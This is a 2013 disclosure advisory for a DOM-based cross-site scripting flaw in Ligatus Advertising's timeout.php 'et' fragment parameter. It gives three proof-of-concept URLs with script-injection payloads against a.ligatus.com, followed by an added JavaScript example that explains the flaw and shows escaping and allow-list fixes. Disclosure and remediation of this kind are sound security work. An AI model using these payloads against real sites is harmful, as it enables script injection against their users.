SSCHADV2013-007 - Ligatus Advertising - DOM Based Cross-site Scripting vulnerability
Advisory: Ligatus Advertising – DOM Based Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-007
Author: Stefan Schurtz
Affected Software: Successfully tested on a.ligatus.com
Vendor URL:
Vendor Status: fixed
======================
Vulnerability Description
======================
The 'et' parameter in Ligatus Advertising is prone to a DOM-based XSS vulnerability. As the PoC URLs show, the value is supplied in the URL fragment (#et=...) of timeout.php.
======================
PoC-Exploit
======================
// Internet Explorer 10
http://a.ligatus.com/timeout.php?ids=29423&e=1#et="><body onload=alert(document.domain) />
// Aurora 8.0
http://a.ligatus.com/timeout.php?ids=29423&e=1#et="><script>alert(document.domain)</script>
// FF 20.0.1
http://a.ligatus.com/timeout.php?ids=29423&e=1#et="><body onload=alert(document.domain) />
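Added example (not part of the original advisory and not Ligatus code): the sketch below shows why a fragment value starting with "> escapes its context, and two client-side fixes. The advisory does not show the vulnerable script, so the sink (a quoted HTML attribute built by string concatenation), the hidden input element, all function names and the numeric format of 'et' are assumptions.

```javascript
// Extract one parameter from a location.hash-style string such as "#et=...".
function fragmentParam(hash, name) {
  const body = hash.startsWith('#') ? hash.slice(1) : hash;
  for (const pair of body.split('&')) {
    const eq = pair.indexOf('=');            // split on the FIRST '=' only
    const key = eq === -1 ? pair : pair.slice(0, eq);
    if (key !== name) continue;
    const raw = eq === -1 ? '' : pair.slice(eq + 1);
    try { return decodeURIComponent(raw); } catch (e) { return raw; }
  }
  return null;
}

// Assumed vulnerable pattern: the raw value lands inside a quoted attribute,
// so a leading "> closes the attribute and the tag.
function renderUnsafe(et) {
  return '<input type="hidden" name="et" value="' + et + '">';
}

// Fix 1: encode for the HTML attribute context before building markup.
function escapeAttr(s) {
  return String(s).replace(/[&<>"'`]/g, c => '&#' + c.charCodeAt(0) + ';');
}
function renderEscaped(et) {
  return '<input type="hidden" name="et" value="' + escapeAttr(et) + '">';
}

// Fix 2: allow-list the value first. Hypothetical assumption: 'et' is numeric.
function renderValidated(et) {
  const ok = typeof et === 'string' && /^[0-9]{1,16}$/.test(et);
  return renderEscaped(ok ? et : '');
}

// Constructed input: the fragment from the advisory's Aurora 8.0 PoC URL.
const POC_HASH = '#et="><script>alert(document.domain)</script>';

function demo() {
  const et = fragmentParam(POC_HASH, 'et');
  return {
    et,
    unsafe: renderUnsafe(et),        // contains a live <script> element
    escaped: renderEscaped(et),      // payload is inert attribute text
    validated: renderValidated(et),  // payload rejected, empty value emitted
  };
}
```

In a browser, assigning the value through DOM properties (element.value, textContent) instead of building markup strings avoids the HTML parser entirely.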
======================
Disclosure Timeline
======================
11-May-2013 – vendor informed by email
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.ligatus.de/
http://www.darksecurity.de/advisories/2013/SSCHADV2013-007.txt